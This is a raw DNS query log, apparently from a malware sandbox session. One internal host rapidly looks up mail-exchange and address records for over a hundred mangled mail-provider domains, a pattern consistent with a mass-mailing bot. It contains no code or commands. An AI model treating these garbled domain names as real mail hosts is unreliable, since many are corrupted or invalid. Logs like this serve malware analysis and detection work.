Nov 30, 2023 11:22:34.243642092 CET	192.168.2.4	1.1.1.1	0xbc58	Standard query (0)	qhlil.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.244071960 CET	192.168.2.4	1.1.1.1	0x924f	Standard query (0)	asgmaanxgdil.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.244071960 CET	192.168.2.4	1.1.1.1	0x90cf	Standard query (0)	domo5ho.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.244343996 CET	192.168.2.4	1.1.1.1	0x6745	Standard query (0)	zma51baya.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.244492054 CET	192.168.2.4	1.1.1.1	0xc28b	Standard query (0)	yahcl.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.244909048 CET	192.168.2.4	1.1.1.1	0xe44c	Standard query (0)	comcaci.net	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.254411936 CET	192.168.2.4	1.1.1.1	0xd2a9	Standard query (0)	hna.be	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.269887924 CET	192.168.2.4	1.1.1.1	0xaeb0	Standard query (0)	m0bhfhblezlsl1.co.tv	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.270324945 CET	192.168.2.4	1.1.1.1	0x7e27	Standard query (0)	san.ee	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.270793915 CET	192.168.2.4	1.1.1.1	0x68d4	Standard query (0)	gcann.cr.co.uk	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.271202087 CET	192.168.2.4	1.1.1.1	0x339b	Standard query (0)	nrnet.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.271905899 CET	192.168.2.4	1.1.1.1	0xa73e	Standard query (0)	yahpn.yb	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.272288084 CET	192.168.2.4	1.1.1.1	0xd0b8	Standard query (0)	gtblil.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.272699118 CET	192.168.2.4	1.1.1.1	0xd50a	Standard query (0)	comcaio.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.274525881 CET	192.168.2.4	1.1.1.1	0x137b	Standard query (0)	s.ddo	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.276268959 CET	192.168.2.4	1.1.1.1	0x7116	Standard query (0)	jubo.cath	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.278403997 CET	192.168.2.4	1.1.1.1	0x36be	Standard query (0)	ee.idbo	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.280050993 CET	192.168.2.4	1.1.1.1	0x7cbb	Standard query (0)	yahgt.net	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.281694889 CET	192.168.2.4	1.1.1.1	0xd6c3	Standard query (0)	1rz.ramal.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.288655996 CET	192.168.2.4	1.1.1.1	0x4ec7	Standard query (0)	yahjl.cxs	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.290898085 CET	192.168.2.4	1.1.1.1	0x22f1	Standard query (0)	cucumbnr.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.292135000 CET	192.168.2.4	1.1.1.1	0x16e	Standard query (0)	daytonpubhocso.cog	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.294281006 CET	192.168.2.4	1.1.1.1	0x4875	Standard query (0)	buromaril.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.294295073 CET	192.168.2.4	1.1.1.1	0xdd15	Standard query (0)	a0i.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.295038939 CET	192.168.2.4	1.1.1.1	0x44f8	Standard query (0)	1.tv	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.295337915 CET	192.168.2.4	1.1.1.1	0x18ee	Standard query (0)	onlist.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.295895100 CET	192.168.2.4	1.1.1.1	0x7d2a	Standard query (0)	ia.eu	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.296279907 CET	192.168.2.4	1.1.1.1	0xd8b9	Standard query (0)	as.hauet	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.300168037 CET	192.168.2.4	1.1.1.1	0x69a3	Standard query (0)	slyvor.as290a.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.300503016 CET	192.168.2.4	1.1.1.1	0xc1b2	Standard query (0)	caatholiomissa.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.300915956 CET	192.168.2.4	1.1.1.1	0x56c6	Standard query (0)	lyco2.comom	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.301107883 CET	192.168.2.4	1.1.1.1	0x4238	Standard query (0)	gco.uk	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.301420927 CET	192.168.2.4	1.1.1.1	0x732f	Standard query (0)	as.r.upze	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.301549911 CET	192.168.2.4	1.1.1.1	0xc79d	Standard query (0)	qebyte.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.302146912 CET	192.168.2.4	1.1.1.1	0x9ba9	Standard query (0)	rhacmtu.au	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.302310944 CET	192.168.2.4	1.1.1.1	0xf730	Standard query (0)	z-a.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.302606106 CET	192.168.2.4	1.1.1.1	0x423	Standard query (0)	horadguc1995l.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.302787066 CET	192.168.2.4	1.1.1.1	0x61f9	Standard query (0)	96l.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.303113937 CET	192.168.2.4	1.1.1.1	0xf980	Standard query (0)	m7l.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.303150892 CET	192.168.2.4	1.1.1.1	0x4415	Standard query (0)	yahgr.neaco	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.303472996 CET	192.168.2.4	1.1.1.1	0x102f	Standard query (0)	t-yil.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.308089018 CET	192.168.2.4	1.1.1.1	0xfc41	Standard query (0)	gez542l.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.314426899 CET	192.168.2.4	1.1.1.1	0x686f	Standard query (0)	deptka7ffmail.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.345973015 CET	192.168.2.4	1.1.1.1	0xbfdc	Standard query (0)	fldie12.jdgwcollfaaba.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.347829103 CET	192.168.2.4	1.1.1.1	0x8306	Standard query (0)	he0114zusmg454lil.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.351290941 CET	192.168.2.4	1.1.1.1	0x8135	Standard query (0)	f.nyhm	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.351397991 CET	192.168.2.4	1.1.1.1	0xeb60	Standard query (0)	ho10a.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.352300882 CET	192.168.2.4	1.1.1.1	0x5b26	Standard query (0)	yahe.nen	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.352411985 CET	192.168.2.4	1.1.1.1	0xaa35	Standard query (0)	il.cm	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.354947090 CET	192.168.2.4	1.1.1.1	0xa86a	Standard query (0)	e-fja8mso.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.355479956 CET	192.168.2.4	1.1.1.1	0xce60	Standard query (0)	rknsieiwn.ail.co.uk	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.356501102 CET	192.168.2.4	1.1.1.1	0xcbf3	Standard query (0)	wn26lil.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.356586933 CET	192.168.2.4	1.1.1.1	0xed53	Standard query (0)	ez786-lcolwicn.coofmail.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.356882095 CET	192.168.2.4	1.1.1.1	0xfd18	Standard query (0)	hgaarnlundejl.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.357098103 CET	192.168.2.4	1.1.1.1	0x454a	Standard query (0)	h4y.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.357415915 CET	192.168.2.4	1.1.1.1	0x1f7a	Standard query (0)	e.gr	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.358432055 CET	192.168.2.4	1.1.1.1	0x663f	Standard query (0)	yahao.lsa	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.358449936 CET	192.168.2.4	1.1.1.1	0x2a36	Standard query (0)	7.dceilil.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.362389088 CET	192.168.2.4	1.1.1.1	0xff35	Standard query (0)	gbya.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.362747908 CET	192.168.2.4	1.1.1.1	0x66f0	Standard query (0)	syn.lil.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.364331961 CET	192.168.2.4	1.1.1.1	0xbeed	Standard query (0)	hotmea1aia.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.367800951 CET	192.168.2.4	1.1.1.1	0x3219	Standard query (0)	loaquorezcil.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.368910074 CET	192.168.2.4	1.1.1.1	0x2cf9	Standard query (0)	yahfll.ianus	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.369371891 CET	192.168.2.4	1.1.1.1	0x7f37	Standard query (0)	ezi.adompany.at	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.369798899 CET	192.168.2.4	1.1.1.1	0xf2f3	Standard query (0)	pyctl.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.372174978 CET	192.168.2.4	1.1.1.1	0xaa33	Standard query (0)	oa.lagdfillemlmlml00xydurail.jkeziac.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.373584032 CET	192.168.2.4	1.1.1.1	0x3375	Standard query (0)	hul.co.uk	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.374861002 CET	192.168.2.4	1.1.1.1	0x9d0c	Standard query (0)	gmdcblil.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.375200987 CET	192.168.2.4	1.1.1.1	0xb659	Standard query (0)	nnblmogblmoglil.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.375443935 CET	192.168.2.4	1.1.1.1	0xdffd	Standard query (0)	mess.ck	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.416168928 CET	192.168.2.4	1.1.1.1	0x67a1	Standard query (0)	h333ol03t8rwslive21lok.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.416410923 CET	192.168.2.4	1.1.1.1	0x612f	Standard query (0)	gmaso.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.416650057 CET	192.168.2.4	1.1.1.1	0xe896	Standard query (0)	feoio.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.417151928 CET	192.168.2.4	1.1.1.1	0x78e9	Standard query (0)	ayls.xcom	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.419394970 CET	192.168.2.4	1.1.1.1	0x329f	Standard query (0)	aomttdl.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.419771910 CET	192.168.2.4	1.1.1.1	0xbb3	Standard query (0)	gr.2mail.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.420064926 CET	192.168.2.4	1.1.1.1	0x7436	Standard query (0)	asail.co.uk	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.432329893 CET	192.168.2.4	1.1.1.1	0xb0fe	Standard query (0)	geu015naryo-uail.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.434588909 CET	192.168.2.4	1.1.1.1	0xd907	Standard query (0)	getococuail.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.434942961 CET	192.168.2.4	1.1.1.1	0xfada	Standard query (0)	hl.comuk	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.436721087 CET	192.168.2.4	1.1.1.1	0x3fe	Standard query (0)	tload.net	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.437158108 CET	192.168.2.4	1.1.1.1	0x7aed	Standard query (0)	sgt9o.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.438510895 CET	192.168.2.4	1.1.1.1	0x1e09	Standard query (0)	gmaiuilil.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.438525915 CET	192.168.2.4	1.1.1.1	0x350	Standard query (0)	kni.ol168.ecom	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.438806057 CET	192.168.2.4	1.1.1.1	0x5b4e	Standard query (0)	sbcgloboo.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.439776897 CET	192.168.2.4	1.1.1.1	0xa9d9	Standard query (0)	klp.tn	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.439776897 CET	192.168.2.4	1.1.1.1	0xe59c	Standard query (0)	yahpl.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.439996004 CET	192.168.2.4	1.1.1.1	0xc6cd	Standard query (0)	sbcglob4m.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.440155983 CET	192.168.2.4	1.1.1.1	0x98f2	Standard query (0)	hot13l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.440191984 CET	192.168.2.4	1.1.1.1	0xffc4	Standard query (0)	gmaigcmar19l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.440418005 CET	192.168.2.4	1.1.1.1	0x26f5	Standard query (0)	osrniamadvea.lrhzda.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.440509081 CET	192.168.2.4	1.1.1.1	0x229b	Standard query (0)	wr.omt222lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.440599918 CET	192.168.2.4	1.1.1.1	0xb2d9	Standard query (0)	yahcl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.440819979 CET	192.168.2.4	1.1.1.1	0x9b75	Standard query (0)	tbsayail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.440926075 CET	192.168.2.4	1.1.1.1	0x9378	Standard query (0)	comcaci.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.441011906 CET	192.168.2.4	1.1.1.1	0xff54	Standard query (0)	qhlil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.441293001 CET	192.168.2.4	1.1.1.1	0x58ab	Standard query (0)	23xd5a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.441318989 CET	192.168.2.4	1.1.1.1	0xd598	Standard query (0)	phcg87k6barre352odseba.dcivenail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.441816092 CET	192.168.2.4	1.1.1.1	0xa87f	Standard query (0)	asgmaanxgdil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.441816092 CET	192.168.2.4	1.1.1.1	0x85bd	Standard query (0)	domo5ho.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.442012072 CET	192.168.2.4	1.1.1.1	0xe96e	Standard query (0)	zma51baya.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.442668915 CET	192.168.2.4	1.1.1.1	0x61d5	Standard query (0)	hl.comuk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.442683935 CET	192.168.2.4	1.1.1.1	0x848d	Standard query (0)	getococuail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.442933083 CET	192.168.2.4	1.1.1.1	0x307f	Standard query (0)	nrnet.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.442970037 CET	192.168.2.4	1.1.1.1	0xab9c	Standard query (0)	gco.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.443128109 CET	192.168.2.4	1.1.1.1	0x6e8e	Standard query (0)	tload.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.443306923 CET	192.168.2.4	1.1.1.1	0x6134	Standard query (0)	hna.be	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.443348885 CET	192.168.2.4	1.1.1.1	0x45c6	Standard query (0)	yahwoooie2ampu.comsh	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.443566084 CET	192.168.2.4	1.1.1.1	0x6334	Standard query (0)	gbivlporollm.cz	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.443598986 CET	192.168.2.4	1.1.1.1	0xe4d0	Standard query (0)	t-yil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.568442106 CET	192.168.2.4	1.1.1.1	0xe310	Standard query (0)	6ail.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.573446035 CET	192.168.2.4	1.1.1.1	0x916a	Standard query (0)	gtblil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.597820044 CET	192.168.2.4	1.1.1.1	0x8f60	Standard query (0)	sgt9o.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.599620104 CET	192.168.2.4	1.1.1.1	0xa163	Standard query (0)	comcaio.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.601866007 CET	192.168.2.4	1.1.1.1	0x7283	Standard query (0)	daytonpubhocso.cog	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.602133989 CET	192.168.2.4	1.1.1.1	0x35	Standard query (0)	rhacmtu.au	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.609085083 CET	192.168.2.4	1.1.1.1	0xe081	Standard query (0)	kni.ol168.ecom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.613076925 CET	192.168.2.4	1.1.1.1	0xf7f9	Standard query (0)	yah23051987hont.net	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.613378048 CET	192.168.2.4	1.1.1.1	0x8913	Standard query (0)	apee.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.613612890 CET	192.168.2.4	1.1.1.1	0x4dfa	Standard query (0)	a.o.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.613858938 CET	192.168.2.4	1.1.1.1	0xf19a	Standard query (0)	ser711a.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.614097118 CET	192.168.2.4	1.1.1.1	0x92fa	Standard query (0)	ochcar.cin4g9tdamn.bagcom	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:35.177942038 CET	192.168.2.4	1.1.1.1	0x720c	Standard query (0)	mn.ch	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:35.178529024 CET	192.168.2.4	1.1.1.1	0xdd5d	Standard query (0)	hl.comuk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:35.182457924 CET	192.168.2.4	1.1.1.1	0xe3e5	Standard query (0)	acooil.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:35.183047056 CET	192.168.2.4	1.1.1.1	0xd21c	Standard query (0)	comcamm.net	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:35.190073013 CET	192.168.2.4	1.1.1.1	0x9e12	Standard query (0)	noweco.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:35.729058027 CET	192.168.2.4	1.1.1.1	0x57c0	Standard query (0)	t.ahlfth	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:35.729327917 CET	192.168.2.4	1.1.1.1	0x4b84	Standard query (0)	ytcjmiil.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:36.176866055 CET	192.168.2.4	1.1.1.1	0x3534	Standard query (0)	gmai76afmail.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:36.176866055 CET	192.168.2.4	1.1.1.1	0x4b84	Standard query (0)	ytcjmiil.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:36.176867008 CET	192.168.2.4	1.1.1.1	0x57c0	Standard query (0)	t.ahlfth	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:36.176973104 CET	192.168.2.4	1.1.1.1	0xdd43	Standard query (0)	il.om	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:36.177496910 CET	192.168.2.4	1.1.1.1	0x80c3	Standard query (0)	rambojoocta.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:36.177692890 CET	192.168.2.4	1.1.1.1	0x2bec	Standard query (0)	cm.cz	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:36.177692890 CET	192.168.2.4	1.1.1.1	0x5f08	Standard query (0)	acesineuiw.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:36.177849054 CET	192.168.2.4	1.1.1.1	0xd79c	Standard query (0)	yahnt.net	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:36.179043055 CET	192.168.2.4	1.1.1.1	0x1eeb	Standard query (0)	cucumbnr.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.179275036 CET	192.168.2.4	1.1.1.1	0xb02	Standard query (0)	yahpn.yb	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.180005074 CET	192.168.2.4	1.1.1.1	0xed99	Standard query (0)	gmo.uk	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:36.180005074 CET	192.168.2.4	1.1.1.1	0x40cf	Standard query (0)	n.n.amdiu	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:36.180336952 CET	192.168.2.4	1.1.1.1	0x66e0	Standard query (0)	ct.ated.net	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:36.180536032 CET	192.168.2.4	1.1.1.1	0x6c57	Standard query (0)	bjail.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:36.180747032 CET	192.168.2.4	1.1.1.1	0x7959	Standard query (0)	a6a.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:36.181545019 CET	192.168.2.4	1.1.1.1	0x2335	Standard query (0)	buromaril.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.181679010 CET	192.168.2.4	1.1.1.1	0xfbc2	Standard query (0)	cm.cz	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.181875944 CET	192.168.2.4	1.1.1.1	0x3c5a	Standard query (0)	acesineuiw.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.182068110 CET	192.168.2.4	1.1.1.1	0xd3b0	Standard query (0)	gmaiuilil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.182250023 CET	192.168.2.4	1.1.1.1	0xd43e	Standard query (0)	yahnt.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.182521105 CET	192.168.2.4	1.1.1.1	0xca19	Standard query (0)	a0i.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.183079004 CET	192.168.2.4	1.1.1.1	0xd2cd	Standard query (0)	yahio.comcm	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:36.185689926 CET	192.168.2.4	1.1.1.1	0x6ad4	Standard query (0)	as.hauet	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.185990095 CET	192.168.2.4	1.1.1.1	0x5c82	Standard query (0)	ia.eu	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.186712027 CET	192.168.2.4	1.1.1.1	0xce90	Standard query (0)	m0bhfhblezlsl1.co.tv	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.187562943 CET	192.168.2.4	1.1.1.1	0xe163	Standard query (0)	slyvor.as290a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.187783957 CET	192.168.2.4	1.1.1.1	0x2744	Standard query (0)	caatholiomissa.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.188333035 CET	192.168.2.4	1.1.1.1	0x60f	Standard query (0)	san.ee	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.188586950 CET	192.168.2.4	1.1.1.1	0xe477	Standard query (0)	1.tv	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.189707041 CET	192.168.2.4	1.1.1.1	0x878c	Standard query (0)	nnblmogblmoglil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.189955950 CET	192.168.2.4	1.1.1.1	0xc353	Standard query (0)	h333ol03t8rwslive21lok.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.190180063 CET	192.168.2.4	1.1.1.1	0x5328	Standard query (0)	gmdcblil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.190474987 CET	192.168.2.4	1.1.1.1	0x16e5	Standard query (0)	hul.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.190855026 CET	192.168.2.4	1.1.1.1	0xcb4a	Standard query (0)	ezi.adompany.at	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.191222906 CET	192.168.2.4	1.1.1.1	0x58ad	Standard query (0)	loaquorezcil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.191222906 CET	192.168.2.4	1.1.1.1	0xf438	Standard query (0)	yahfll.ianus	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.191656113 CET	192.168.2.4	1.1.1.1	0x9266	Standard query (0)	hotmea1aia.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.192019939 CET	192.168.2.4	1.1.1.1	0xca24	Standard query (0)	syn.lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.192354918 CET	192.168.2.4	1.1.1.1	0x6931	Standard query (0)	ytcjmiil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.192893028 CET	192.168.2.4	1.1.1.1	0xf745	Standard query (0)	t.ahlfth	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.192893028 CET	192.168.2.4	1.1.1.1	0x98ce	Standard query (0)	yahio.comcm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.193065882 CET	192.168.2.4	1.1.1.1	0x3c22	Standard query (0)	noweco.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.193371058 CET	192.168.2.4	1.1.1.1	0xb130	Standard query (0)	acooil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.193568945 CET	192.168.2.4	1.1.1.1	0x3fbd	Standard query (0)	ochcar.cin4g9tdamn.bagcom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.193789005 CET	192.168.2.4	1.1.1.1	0xc76d	Standard query (0)	ser711a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.193805933 CET	192.168.2.4	1.1.1.1	0x2a3	Standard query (0)	mn.ch	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.193983078 CET	192.168.2.4	1.1.1.1	0x8943	Standard query (0)	gmai76afmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.194067001 CET	192.168.2.4	1.1.1.1	0x4572	Standard query (0)	asail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.194156885 CET	192.168.2.4	1.1.1.1	0xb0cb	Standard query (0)	geu015naryo-uail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.194417000 CET	192.168.2.4	1.1.1.1	0x3dba	Standard query (0)	gr.2mail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.194488049 CET	192.168.2.4	1.1.1.1	0xbc2	Standard query (0)	feoio.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.194598913 CET	192.168.2.4	1.1.1.1	0x86b4	Standard query (0)	aomttdl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:36.194677114 CET	192.168.2.4	1.1.1.1	0xbc91	Standard query (0)	gmaso.com	A (IP address)	IN (0x0001)	false
